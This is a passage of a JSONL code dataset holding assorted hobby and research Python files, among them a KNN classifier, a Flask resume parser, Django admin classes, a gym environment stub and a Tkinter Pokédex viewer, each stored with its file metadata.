logger.info('gap_pred shape {}, f_unpred_arr shape {}, f_pred_res shape {}'.format(gap_pred.shape, f_unpred_arr.shape, f_pred_res.shape))\n if gap_pred is not None and f_unpred_arr is not None and f_pred_res is not None:\n whl_cnv_re = np.concatenate((gap_pred, f_unpred_arr, f_pred_res), axis=0)\n elif gap_pred is not None and f_unpred_arr is not None and f_pred_res is None:\n whl_cnv_re = np.concatenate((gap_pred, f_unpred_arr), axis=0)\n elif gap_pred is not None and f_pred_res is not None and f_unpred_arr is None:\n whl_cnv_re = np.concatenate((gap_pred, f_pred_res), axis=0)\n elif gap_pred is None and f_unpred_arr is not None and f_pred_res is not None:\n whl_cnv_re = np.concatenate((f_unpred_arr, f_pred_res), axis=0)\n elif f_pred_res is None and f_unpred_arr is None and gap_pred is not None:\n whl_cnv_re = gap_pred.copy()\n elif gap_pred is None and f_unpred_arr is None and f_pred_res is not None:\n whl_cnv_re = f_pred_res.copy()\n elif f_pred_res is None and gap_pred is None and f_unpred_arr is not None:\n whl_cnv_re = f_unpred_arr.copy()\n\n del gap_pred, f_unpred_arr, f_pred_res\n\n ind = np.argsort(whl_cnv_re[:, 0])\n whl_cnv_re = whl_cnv_re[ind]\n\n out_df = pd.DataFrame(data=whl_cnv_re,\n columns=['seg_s', 'seg_e', 'seg_l', 'indicator', 'cov_ratio', 'p_neu', 'p_del', 'p_dup', 'pred_l'])\n out_df[['seg_s', 'seg_e', 'seg_l', 'indicator', 'pred_l']] = out_df[\n ['seg_s', 'seg_e', 'seg_l', 'indicator', 'pred_l']].astype(int)\n out_df.to_csv(call_out_fn, index=False, sep='\\t')\n logger.info('Done, online cnv call results saved into {}'.format(call_out_fn))\n\n\n\n\n\n\n\n\n\n","sub_path":"online/online_call_mp_gpu_1.py","file_name":"online_call_mp_gpu_1.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165024068","text":"# python3 test.py [v]\n\nimport sys\nif len(sys.argv) == 2:\n v = sys.argv[1]\nelse:\n v = '1'\n\nname = 'keyboard-row'\nfrom importlib.machinery import SourceFileLoader\nmodule = SourceFileLoader('', name + '.' + v + '.py').load_module()\n\ndef test(s, input, exp):\n print('----------')\n words = input\n print('words:', words)\n print('expect:', exp)\n res = s.findWords(words)\n print('result:', res)\n if sorted(exp) != sorted(res):\n print('--- ERROR ---')\n print()\n\ns = module.Solution()\n\n# -----\ninput = ['ABc', 'mN', '']\nexp = ['mN', '']\ntest(s, input, exp)\n\n# -----\ninput = ['Hello', 'Alaska', 'Dad', 'Peace']\nexp = ['Alaska', 'Dad']\ntest(s, input, exp)\n","sub_path":"juice/leet/0500/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136687264","text":"import numpy as np\nimport sys\nimport math\nfrom numpy.linalg import norm\nfrom updateOBB_v2 import updateOBB_v2\nfrom gen2dOffset_v2 import gen2dOffset_v2\nfrom genTransMat import genTransMat\nsys.path.append('../vistools')\n\ndef genOffsetRep( data, labelset ):\n #GENOFFSETREP transform the data into offset format.\n # INPUT: data - the data is a struct with\n # \"kids\" (hierarchy) and\n # \"obblist\" (boxes with absolute positions)\n # \"labellist\" (labels of the boxes)\n # \"layers\" (layers of the boxes)\n # labelset - the category list for this dataset\n #\n # OUTPUT: ndata - the ndata is a struct with\n # \"kids\" (hierarchy) the same with input\n # \"leafreps\" (layer+label of boxes)\n # \"relposreps\" (relative positions between siblings)\n\n #addpath(genpath('..\\0-data'))\n\n kids = data['kids']\n obblist = data['obblist']\n labellist = data['labellist']\n leafnum = obblist.shape[1]\n nodenum = len(kids)\n\n ## extract the sizes\n sizevec = obblist[9:12]\n\n ## extract the layers\n # if(isfield(data,'layers'))\n # layers = data.layers\n # end\n\n ## extract the labels\n classnum = len(labelset)\n labelvecs = np.zeros([classnum, len(labellist)])\n for i in range(leafnum):\n label = labellist[i]\n ind = [i for i, val in enumerate(labelset) if val == label]\n labelvecs[ind, i] = 1\n\n ## compute the relative positions\n # 1. update the boxes of the internal nodes\n obblist = obblist[:12]\n for j in range(leafnum, nodenum):\n k = kids[j]\n flag = k[0]\n if flag == 1:\n # support\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n pobb = updateOBB_v2(obb1, obb2)\n obblist = np.c_[ obblist, pobb ]\n #obblist[:,j] = pobb\n\n elif flag == 2:\n # group\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n len1 = norm(obb1[9:12], 2)\n len2 = norm(obb2[9:12], 2)\n if len1 > len2:\n pobb = updateOBB_v2(obb1, obb2)\n else:\n pobb = updateOBB_v2(obb2, obb1)\n k[1], k[2] = k[2], k[1]\n\n obblist = np.c_[ obblist, pobb ]\n\n elif flag == 3:\n # surround\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n obb3 = obblist[:,k[3] - 1]\n cent1 = obb1[0:3]\n front1 = obb1[3:6]\n up1 = obb1[6:9]\n cent2 = obb2[0:3]\n front2 = cent2 - cent1\n cent3 = obb3[0:3]\n front3 = cent3 - cent1\n transform = genTransMat(front1, up1)\n front2 = transform.dot(front2)\n front2 = front2 / norm(front2)\n degree2 = math.atan(front2[2] / front2[0]) * 180 / math.pi\n if front2[0] < 0:\n if degree2 < 0:\n degree2 = degree2 - 180\n else:\n degree2 = degree2 + 180\n\n degree2 = degree2 % 360\n front3 = transform.dot(front3)\n front3 = front3 / norm(front3)\n degree3 = math.atan(front3[2] / front3[0]) * 180 / math.pi\n if front3[0] < 0:\n if degree3 < 0:\n degree3 = degree3 - 180\n else:\n degree3 = degree3 + 180\n\n degree3 = degree3 % 360\n if degree3 < degree2:\n obb2, obb3 = obb3, obb2\n k[2], k[3] = k[3], k[2]\n\n pobb = updateOBB_v2(obb1, obb2)\n pobb = updateOBB_v2(pobb, obb3)\n obblist = np.c_[ obblist, pobb ]\n elif flag == 4:\n # room\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n pobb = updateOBB_v2(obb1, obb2)\n obb2 = obblist[:,k[3] - 1]\n pobb = updateOBB_v2(pobb, obb2)\n obb2 = obblist[:,k[4] - 1]\n pobb = updateOBB_v2(pobb, obb2)\n obb2 = obblist[:,k[5] - 1]\n pobb = updateOBB_v2(pobb, obb2)\n obblist = np.c_[ obblist, pobb ]\n elif flag == 5:\n # wall\n obb1 = obblist[:,k[1] - 1]\n obb2 = obblist[:,k[2] - 1]\n pobb = updateOBB_v2(obb1, obb2)\n obblist = np.c_[ obblist, pobb ]\n\n kids[j] = k\n\n\n ## splitting walls\n # for i = 1:len(kids)\n # k = kids{i}\n # \tif(k(1)==5)\n # box1 = obblist[:,k[1] - 1]\n # box2 = obblist[:,k[2] - 1]\n # [ rp, psize3,delta_midy ] = gen2dOffset_v2( box1, box2, 1 )\n # sizevec(3,k[1]] = psize3\n # obblist[12,k[1]] = psize3\n # cent1 = obblist[1:3,k[1]]\n # front1 = obblist[4:6,k[1]]\n # up1 = obblist[7:9,k[1]]\n # axes1 = cross(front1,cent1)\n # axes1 = axes1/norm(axes1,2)\n # cent1 = cent1-axes1*delta_midy\n # obblist[1:3,k[1]] = cent1\n # obblist[:,i) = updateOBB_v2(obblist(:,k[1]], obblist[:,k[2] - 1])\n # end\n # if(k(1)==4)\n # obb1 = obblist[:,k[1] - 1]\n # obb2 = obblist[:,k[2] - 1]\n # pobb = updateOBB_v2(obb1, obb2)\n # obb2 = obblist[:,k[3] - 1]\n # pobb = updateOBB_v2(pobb, obb2)\n # obb2 = obblist[:k[4]]\n # pobb = updateOBB_v2(pobb, obb2)\n # obb2 = obblist[:k[5]]\n # pobb = updateOBB_v2(pobb, obb2)\n # obblist[:,i) = pobb\n # end\n # end\n\n # 2. compute the relative positions between childen and parents\n relposreps = [ [] for i in range(leafnum) ]\n\n for i in range(leafnum, nodenum):\n # pobb = obblist[:,i]\n k = kids[i]\n rplist =[]\n if len(k) > 2:\n box1 = obblist[:,k[1] - 1]\n for j in range(2, len(k)):\n box2 = obblist[:,k[j] - 1]\n\n # compute the relative positions between two boxes\n rp, _, _ = gen2dOffset_v2( box1, box2, 0 )\n rplist.append(rp)\n\n relposreps.append(rplist)\n\n lastmerge = kids[-1]\n wallidx = lastmerge[2:]\n rplist = []\n box1 = obblist[:,lastmerge[1] - 1]\n for i in range(len(wallidx)):\n box2 = obblist[:, wallidx[i] - 1]\n rp, _, _ = gen2dOffset_v2(box1, box2, 0)\n rplist.append(rp)\n box1 = box2\n\n relposreps[-1] = rplist\n\n # colorlist = {'r','y','g','b'}\n # for i = 1:len(wallidx)\n # if(wallidx(i)>leafnum)\n # k = kids{wallidx(i)}\n # draw3dOBB_v2(obblist(:,k[1]],colorlist{i})\n # draw3dOBB_v2(obblist(:,k[2]],colorlist{i})\n # else\n # draw3dOBB_v2(obblist(:,wallidx(i)),colorlist{i})\n # end\n # end\n # close gcf\n\n ## 3. compute the attachment to the walls\n # wallattachment = []\n # for i = 1:size(obblist,2)\n # obb = obblist[:,i)\n # wallattach = zeros(size(data.walllist,2),1)\n # for j = 1:size(data.walllist,2)\n # wobb = data.walllist(:,j)\n # dist = obbdist(obb',wobb')\n # wallattach(j) = dist<0.01\n # end\n # wallattachment = [wallattachment,wallattach]\n # end\n\n ## form the leafreps\n leafreps = labelvecs\n # if(exist('layers','var'))\n # leafreps = [layers';leafreps]\n # end\n leafreps = np.r_[sizevec, leafreps]\n\n ## form the ndata\n ndata = {}\n ndata['kids'] = kids\n ndata['leafreps'] = leafreps\n ndata['relposreps'] = relposreps\n # ndata.wallattachment = wallattachment\n\n return ndata","sub_path":"3-datapreparation/genOffsetRep.py","file_name":"genOffsetRep.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19690611","text":"class BinarySearchTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n # Insert the given value into the tree\n def insert(self, value):\n # Compare to root node\n # If lesser go to left child\n if (value < self.value):\n if (self.left is None):\n # insert\n self.left = BinarySearchTree(value)\n else:\n # move left\n self.left.insert(value)\n # If greater or equal to, go right\n elif (value >= self.value):\n if (self.right is None):\n # insert\n self.right = BinarySearchTree(value)\n else:\n # move right and go through insert function\n self.right.insert(value) \n # Return True if the tree contains the value\n # False if it does not\n def contains(self, target):\n # If root is target, return\n if (target == self.value):\n return True\n elif (target < self.value):\n if (self.left is None):\n return False\n else:\n # move left\n # repeat\n return self.left.contains(target)\n elif (target > self.value):\n if (self.right is None):\n return False\n else:\n # move right\n # repeat\n return self.right.contains(target)","sub_path":"names/BinarySearchTree.py","file_name":"BinarySearchTree.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152110973","text":"#from statistics import median\n#import collections\n#aa = collections.Counter(a) # list to list || .most_common(2)で最大の2���とりだせるお a[0][0]\nfrom fractions import gcd\nfrom itertools import combinations,permutations,accumulate # (string,3) 3回\n#from collections import deque\nfrom collections import deque,defaultdict,Counter\nimport decimal\nimport re\n#import bisect\n#\n# d = m - k[i] - k[j]\n# if kk[bisect.bisect_right(kk,d) - 1] == d:\n#\n#\n#\n# pythonで無理なときは、pypyでやると正解するかも!!\n#\n#\n# my_round_int = lambda x:np.round((x*2 + 1)//2)\n# 四捨五入\nimport sys\nsys.setrecursionlimit(10000000)\nmod = 10**9 + 7\n#mod = 9982443453\ndef readInts():\n return list(map(int,input().split()))\ndef I():\n return int(input())\nn,k = readInts()\ndef calc(a):\n sml = (0 + a-1) * a //2\n lar = sml + a * (n-a+1)\n return lar - sml + 1\nans = 0\nfor i in range(k,n+2):\n ans += calc(i) % mod\nprint(ans % mod)\n","sub_path":"Python_codes/p02708/s657466534.py","file_name":"s657466534.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"546134999","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 10:56:21 2019\n\n@author: 17pd04\n\"\"\"\n\nimport xlrd as xl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\n\ndef split(data):\n x = []\n y = []\n for i in range(len(data)):\n x.append(data[i][0])\n y.append(data[i][1])\n return x,y\n\ndef KNN(x,test_x,K):\n dist = []\n\n for i in range(len(x)):\n dist.append(m.sqrt((x[i][0] - test_x[0])**2 + (x[i][1] - test_x[1])**2 ))\n \n x_dist = list(zip(dist,x,y))\n x_dist.sort()\n \n count0 = 0\n count1 = 0\n \n for i in range(K):\n if(x_dist[i][2] == 0):\n count0 += 1\n elif(x_dist[i][2] == 1):\n count1 += 1\n \n if(count0 > count1):\n return 0\n elif(count1 > count0):\n return 1\n\nwb = xl.open_workbook(\"data.xlsx\")\nsheet = wb.sheet_by_index(0)\n\ndata = []\nx = []\ny = []\ny_name = ''\nfeature_name = []\nK = 3\n\nno_of_col = sheet.ncols\n\n\nfor i in range(no_of_col):\n data.append(sheet.col_values(i))\n\ny.extend(data.pop(no_of_col-1))\n\ny_name = y.pop(0)\n\nfor i in range(len(data)):\n feature_name.append(data[i].pop(0))\n\nx = np.transpose(data).astype(int)\n\nx0,y0 = [],[]\nx1,y1 = [],[]\nclass0,class1 = [],[]\nfor i in range(len(x)):\n if(y[i] == 0):\n class0.append(x[i])\n elif(y[i] == 1):\n class1.append(x[i])\n\nx0,y0 = split(class0)\nx1,y1 = split(class1)\n\n\nplt.scatter(x0,y0,c = 'r')\nplt.scatter(x1,y1,c = 'g')\n\ntest_x = [6,1]\n\nfor i in range(1,8):\n test_y = KNN(x,test_x,i)\n print(\"For K = \",i,\", the test data belongs to class \",test_y)\n\n\n#print(\"Enter the test data : \")\n#for i in range(len(feature_name)):\n# print(\"Enter the \",feature_name[i])\n# temp = int(input())\n# test_x.append(temp)\n \n#print(\"For K = \",K,\", the test data belongs to class \",test_y)\nplt.scatter(test_x[0],test_x[1])\nplt.legend(['Red = Class 0','Green = Class 1','Blue = Test Data'],loc = 'best')","sub_path":"KNN-classifier.py","file_name":"KNN-classifier.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591374573","text":"import os\nimport sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nimport utils.config\nimport logging\nimport cv2\n\nfrom video_processing.io import VideoCapture\n\n\ndef show_video(video_name, output_dir = \"\"):\n vc = VideoCapture(video_name)\n\n while True:\n ret = vc.read()\n if ret:\n vc.imshow(window_name=\"show\")\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n elif cv2.waitKey(1) & 0xFF == ord('s') and output_dir != \"\":\n vc.save(output_dir)\n else:\n break\n\n del vc\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', help='path to video')\n parser.add_argument('-o', default=\"\", help='path to dir for img save')\n\n args = parser.parse_args()\n\n video_name = args.i\n output_dir = args.o\n\n show_video(video_name, output_dir)","sub_path":"src/show_video.py","file_name":"show_video.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384220606","text":"import numpy as np\nimport math\n\n\ndef jacobi(A, N=100, eps=10e-3):\n\n\tdim = A.shape[0]\n\n\tev = np.matrix(np.identity(dim))\n\tn = N\n\n\twhile(True):\n\t\tabsA = np.abs(A)\n\n\t\tabsA = absA - np.diagflat(np.diag(absA))\n\n\t\taxis = np.argmax(absA)\n\t\tp = axis // dim\n\t\tq = axis % dim\n\n\t\tif abs(A[p,q]) < eps:\n\t\t\tbreak\n\n\t\tif not p > q:\n\t\t\tpp = p\n\t\t\tp = q\n\t\t\tq = pp\n\n\n\t\talpha = (A[p,p] - A[q,q])\n\t\tbeta = - A[p,q]\n\t\tgamma = abs(alpha) / math.sqrt(alpha * alpha + beta * beta)\n\n\t\tcos = math.sqrt((1 + gamma) / 2)\n\t\tsin = math.copysign(math.sqrt((1 - gamma) / 2), alpha * beta)\n\n\t\ta = A.copy()\n\n\t\tfor i in range(dim):\n\t\t\ta[p,i] = cos * A[p,i] - sin * A[q,i]\n\t\t\ta[q,i] = sin * A[p,i] + cos * A[q,i]\n\t\t\ta[i,q] = cos * A[i,p] - sin * A[i,q]\n\t\t\ta[i,q] = sin * A[i,p] + cos * A[i,q]\n\n\t\ta[p,q] = 0\n\t\ta[q,p] = 0\n\n\t\tA = a.copy()\n\n\t\tn -= 1\n\t\tif n < 0:\n\t\t\tbreak\n\n\treturn A\n\nif __name__ == '__main__':\n\tA = np.array([1., 0], [0, 1])\n","sub_path":"jacobi/jacobi.py","file_name":"jacobi.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288552223","text":"import os\n\nfrom flask import Flask, jsonify, request, flash\n\nfrom utils import extract_text_from_pdf, extract_name, extract_mobile_numbers, extract_emails, extract_skills, \\\n get_skills\n\nUPLOAD_FOLDER = 'upload'\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nALLOWED_EXTENSIONS = set(['pdf'])\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/parse', methods=['POST'])\ndef parse_cv():\n if 'file' not in request.files:\n flash('No file part')\n\n file = request.files['file']\n\n if file and allowed_file(file.filename):\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], 'tmp.pdf'))\n\n file_path = 'upload/tmp.pdf'\n text = ''\n for page in extract_text_from_pdf(file_path):\n text += ' ' + page\n\n name = extract_name(text)\n phone = extract_mobile_numbers(text)\n email = extract_emails(text)\n skills = extract_skills(text)\n return jsonify(name=name, phones=phone, emails=email, skills=skills)\n\n\n@app.route('/skills')\ndef skills():\n return jsonify(skills=get_skills())\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183085724","text":"from django.contrib.admin.options import ModelAdmin, TabularInline\nfrom .models import College, SlotBonus, MLBData, DOLSalary, PrMajorsData, SigningBonus, Visitor, Scenario, PrOutPosition, PrOutStatus\nfrom django.contrib import admin\n\nclass CollegeAdmin(ModelAdmin):\n\tlist_filter = ('type',)\n\tsearch_fields = ('school',)\n\tlist_display = ('id', 'school', 'type', 'starting', 'mid_career','start_fx', 'mid_fx')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(College, CollegeAdmin)\n\nclass SlotBonusAdmin(ModelAdmin):\n\tlist_filter = ('draft_cell', )\n\tlist_display = ('id', 'pick', 'amount', 'draft_cell')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(SlotBonus, SlotBonusAdmin)\n\nclass MLBDataAdmin(ModelAdmin):\n\tlist_filter = ('position', 'status', 'draft_cell', 'year')\n\tlist_display = ('id', 'position', 'status', 'draft_cell', 'year', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(MLBData, MLBDataAdmin)\n\nclass DOLSalaryAdmin(ModelAdmin):\n\tsearch_fields = ('occupation',)\n\tlist_display = ('id', 'occupation', 'sal10', 'sal25', 'sal50', 'sal75', 'sal90')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(DOLSalary, DOLSalaryAdmin)\n\nclass PrMajorsDataAdmin(ModelAdmin):\n\tlist_filter = ('position', 'status', 'draft_cell')\n\tlist_display = ('id', 'position', 'status', 'draft_cell', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(PrMajorsData, PrMajorsDataAdmin)\n\nclass SigningBonusAdmin(ModelAdmin):\n\tlist_filter = ('draft_cell', 'status')\n\tlist_display = ('id', 'draft_cell', 'status', 'amount')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(SigningBonus, SigningBonusAdmin)\n\nclass ScenarioAdmin(ModelAdmin):\n\tlist_filter = ('visitor', 'college')\n\tlist_display = ('id', 'visitor', 'timestamp', 'anonymous', 'college', 'alt', 'sec', 'pick', 'pos', 'status')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(Scenario, ScenarioAdmin)\n\nclass ScenarioInline(TabularInline):\n\tmodel = Scenario\n\treadonly_fields = ('anonymous','college','alt','sec','pick','pos','status')\n\textra = 0\n\nclass VisitorAdmin(ModelAdmin):\n\tlist_display = ('id', 'username', 'fullname', 'ip')\n\treadonly_fields = ('modx_id','username','fullname','ip','user_agent')\n\tinlines = [ScenarioInline,]\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(Visitor, VisitorAdmin)\n\n\nclass PrOutPositionAdmin(ModelAdmin):\n\tlist_filter = ('position', 'year')\n\tlist_display = ('id', 'position', 'year', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(PrOutPosition, PrOutPositionAdmin)\n\nclass PrOutStatusAdmin(ModelAdmin):\n\tlist_filter = ('status', 'year')\n\tlist_display = ('id', 'status', 'year', 'value')\n\tModelAdmin.ordering = ('id', )\nadmin.site.register(PrOutStatus, PrOutStatusAdmin)\n","sub_path":"acefs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158504372","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2021/5/10 3:39 下午\n# @File : xiguaenv.py\n# @Author: johnson\n# @Contact : github: johnson7788\n# @Desc : 使用gym封装一下, 暂未完成\n\nimport numpy as np\nimport gym\nfrom gym import spaces\nfrom stable_baselines3.common.env_checker import check_env\nfrom State import AI_Board\n\nclass DaxiguaEnv(gym.Env):\n \"\"\"\n 大西瓜env\n \"\"\"\n def __init__(self, grid_size=10):\n super(DaxiguaEnv, self).__init__()\n # 定义动作和观察空间\n # 他们必须是gym.spaces对象\n # 当使用离散动作时,这里我们14个动作:代表放置14个位置\n n_actions = 14\n self.game = AI_Board()\n self.action_space = spaces.Discrete(n_actions)\n # 这里我们观察到的游戏的返回的图像\n self.observation_space = spaces.Box(low=0, high=255,\n shape=(N_CHANNELS, HEIGHT, WIDTH), dtype=np.uint8)\n\n def reset(self):\n \"\"\"\n 重要提示:观察必须是numpy数组\n :return: (np.array)\n \"\"\"\n # 初始化网格右侧的agent\n self.agent_pos = self.grid_size - 1\n # 这里我们将其转换为float32,以使其更加通用(以防我们想使用连续操作), eg: 返回[9.]\n return np.array([self.agent_pos]).astype(np.float32)\n\n def step(self, action):\n if action == self.LEFT:\n self.agent_pos -= 1\n elif action == self.RIGHT:\n self.agent_pos += 1\n else:\n raise ValueError(f\"收到了不属于动作空间的动作 {action}\")\n\n # 网格的边界裁剪, 小于0的输出0,大于grid_size输出grid_size, 如果在0到grid_size中间,直接返回这个值\n self.agent_pos = np.clip(self.agent_pos, 0, self.grid_size)\n\n # 我们是网格左边的吗?用于判断是否结束了这个episode\n done = bool(self.agent_pos == 0)\n\n # 除了到达目标时,其他地方的奖励都是null的(grid的左边)。\n reward = 1 if self.agent_pos == 0 else 0\n\n # 我们可以选择传递额外的信息,但我们现在还没有使用。\n info = {}\n # 所以返回了np.array([self.agent_pos]).astype(np.float32)代表观察空间,reward代表奖励\n return np.array([self.agent_pos]).astype(np.float32), reward, done, info\n\n def render(self, mode='console'):\n if mode != 'console':\n raise NotImplementedError()\n # 用x代表agent的位置\n print(f\"目前机器人的位置是,用x代表机器人: \")\n print(\".\" * self.agent_pos, end=\"\")\n print(\"x\", end=\"\")\n print(\".\" * (self.grid_size - self.agent_pos))\n\n def close(self):\n pass\n\n\ndef do_check_env():\n \"\"\"\n 检查我们的自定义的env是否符合gym的规则\n :return:\n :rtype:\n \"\"\"\n print(f\"开始检查env是否满足gym的设定\")\n env = GoLeftEnv()\n print(f\"当前环境的观测空间是 {env.observation_space}\")\n print(f\"当前环境的动作空间是 {env.action_space}\")\n print(f\"当前环境的一个动作抽样是 {env.action_space.sample()}\")\n # 如果环境不符合接口,将抛出一个错误。 来检查你的环境是否遵循Gym接口。它还可以选择检查环境是否与Stable-Baselines兼容(必要时发出警告)\n check_env(env, warn=True)\n\n\n\n\nif __name__ == '__main__':\n do_check_env()","sub_path":"xiguaenv.py","file_name":"xiguaenv.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75246997","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\nfrom get_poke_info import Pokedex\nfrom voice_to_text import voice_command\nimport time\n\nclass ToolTip:\n '''\n Tooltip class found online\n '''\n def __init__(self, button, text='widget info'):\n self.button = button\n self.text = text\n self.button.bind(\"\", self.enter)\n self.button.bind(\"\", self.close)\n\n def enter(self, event=None):\n x = y = 0\n x, y, cx, cy = self.button.bbox(\"insert\")\n x += self.button.winfo_rootx() + 25\n y += self.button.winfo_rooty() + 20\n self.tooltip = tk.Toplevel(self.button)\n self.tooltip.wm_overrideredirect(True)\n self.tooltip.wm_geometry(\"+%d+%d\" % (x, y))\n label = tk.Label(self.tooltip, text=self.text, justify='left',\n background='yellow', relief='solid', borderwidth=1,\n font=(\"times\", \"8\", \"normal\"))\n label.pack(ipadx=1)\n\n def close(self, event=None):\n if self.tooltip:\n self.tooltip.destroy()\n\ndef add_sprite(file_name, pokemon_icon_slot, bottom_frame):\n size = int(bottom_frame.winfo_height()*0.25)\n img = ImageTk.PhotoImage(Image.open('./poke_sprites/'+ file_name).resize((size, size)))\n pokemon_icon_slot.delete(\"all\")\n pokemon_icon_slot.create_image(0,0, anchor='nw', image=img)\n pokemon_icon_slot.image = img\n\ndef display_results(input_box, button, results, pokemon_icon_slot, bottom_frame, isAudio=False):\n #get id of pokemon by voice input\n if isAudio:\n button['state'] = 'disabled'\n poke_name, poke_description, dex_num = voice_command()\n #In case of error\n if poke_name is None:\n button['state']='normal'\n return\n input_box.delete(0,tk.END)\n input_box.insert(0, str(dex_num))\n time.sleep(1)\n else:\n dex_num = input_box.get().strip()\n poke_name, poke_description = Pokedex.get_poke_info(dex_num)\n results['text'] = 'Name: {}\\nDescription: {}'.format(poke_name, poke_description)\n try:\n poke_icon = Pokedex.get_poke_sprite(poke_name.strip())\n add_sprite(poke_icon, pokemon_icon_slot, bottom_frame)\n except Exception as e:\n print('Exception Occured:' + str(e))\n finally:\n button['state']='normal'\n\n\ndef gui():\n #Create the root\n root = tk.Tk()\n root.title('Voice Dex')\n root.iconbitmap('C:/Users/Daniel/Documents/voice-encoder-gui/pokedex_icon.ico')\n\n #Define the canvas\n HEIGHT = 475\n WIDTH = 400\n canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\n background_image = ImageTk.PhotoImage(Image.open('./pokedex.png').resize((WIDTH, HEIGHT)))\n background_label = tk.Label(root, image=background_image)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n canvas.pack()\n \n #Add the top frame and content\n frame = tk.Frame(root, bg='#c20a19', bd=5)\n frame.place(relx=0.73, rely=0.1, relwidth=0.33, relheight=0.1, anchor='n')\n \n #Adding the input bar\n textbox = tk.Entry(frame, font=40)\n textbox.place(relwidth=0.45, relheight=1)\n\n #Adding the text-search button\n pokeball_icon = tk.PhotoImage(file = './pokeball.png')\n button = tk.Button(frame, text='Pokemon', image=pokeball_icon, font=40, command=lambda: display_results(textbox, button, results, pokemon_icon, bottom_frame))\n button.place(relx=0.47, relheight=1, relwidth=0.25)\n button_tooltip = ToolTip(button, \"Search for a pokemon based on dex num\")\n\n #Adding the audio-search button\n mic_icon = tk.PhotoImage(file='micicon.png')\n audio_button = tk.Button(frame, text='Speak', image=mic_icon, font=40, command=lambda: display_results(textbox, button, results, pokemon_icon, bottom_frame, True))\n audio_button.place(relx=0.74, relheight=1, relwidth=0.25)\n audio_button_tooltip = ToolTip(audio_button, \"Say a number between 1 and 800\")\n\n #Add the bottom frame and content\n bottom_frame = tk.Frame(root, bg='#c20a19', bd=10)\n bottom_frame.place(relx=0.55, rely=0.25, relwidth=0.7, relheight=0.6, anchor='n')\n\n #Display the results of the api call\n bg_color = 'white'\n results = tk.Label(bottom_frame, anchor='nw', wraplength=260, justify='left', bd=4)\n results.config(font=(\"Courier\", 11), bg=bg_color)\n results.place(relwidth=1, relheight=1)\n\n #sprite icon goes here\n pokemon_icon = tk.Canvas(results, bg=bg_color, bd=0, highlightthickness=0)\n pokemon_icon.place(relx=.36, rely=.75, relwidth=1, relheight=0.5)\n\n root.resizable(False, False)\n root.mainloop() \n\nif __name__ == '__main__':\n gui()","sub_path":"pokedex_app.py","file_name":"pokedex_app.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"179741710","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport os.path\nimport time\nimport itertools\nimport logging\nimport pkg_resources\n\nimport sqlalchemy\nimport sqlalchemy.ext.declarative\nimport sqlalchemy.orm\nimport alembic\nimport alembic.config\n\nfrom utils import mkdir_p\n\n\n# There is a lag between an archive being created and the archive\n# appearing on an inventory. Even if the inventory has an InventoryDate\n# of after the archive was created, it still doesn't necessarily appear.\n# So only warn of a missing archive if the archive still hasn't appeared\n# on an inventory created 